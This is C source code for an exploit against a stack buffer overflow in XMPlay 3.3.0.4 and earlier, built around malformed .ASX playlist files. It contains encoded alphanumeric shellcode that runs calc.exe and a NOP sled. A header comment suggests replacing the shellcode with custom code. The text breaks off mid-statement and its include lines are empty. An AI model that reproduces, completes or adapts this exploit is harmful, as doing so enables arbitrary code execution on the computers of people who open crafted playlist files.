/*
===================================================================
0-day XMPlay 3.3.0.4 .ASX Filename Buffer Overflow Exploit
===================================================================
XMPlay 3.3.0.4 and lower experiance a stack-based buffer overflow when
loading malformed .ASX files
This merely executes CALC.exe but you could always add your own custom
shellcode (alpha2)
===============
ASX
[
]
===============
Reported Exploit Date: 11/21/2006
*/
#include
#include
#include
int main(int argc, char *argv[])
{
FILE *Exploit;
char buffer[512];
/* Executes Calc.exe Alpha2 Shellcode Provided by Expanders */
unsigned char scode[] =
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
"YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM"
"5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp"
"LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip"
"sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA";
char NOPSled[50];
char tail[] = ".mid\x22\r\n";
int JMP, x;
printf("\n======================================================================\n");
printf("XMPlay 3.3.0.4 and prior ASX Filename Buffer Overflow Exploit\n");
printf("Discovered and Coded By: Greg Linares \n");
printf("Usage: %s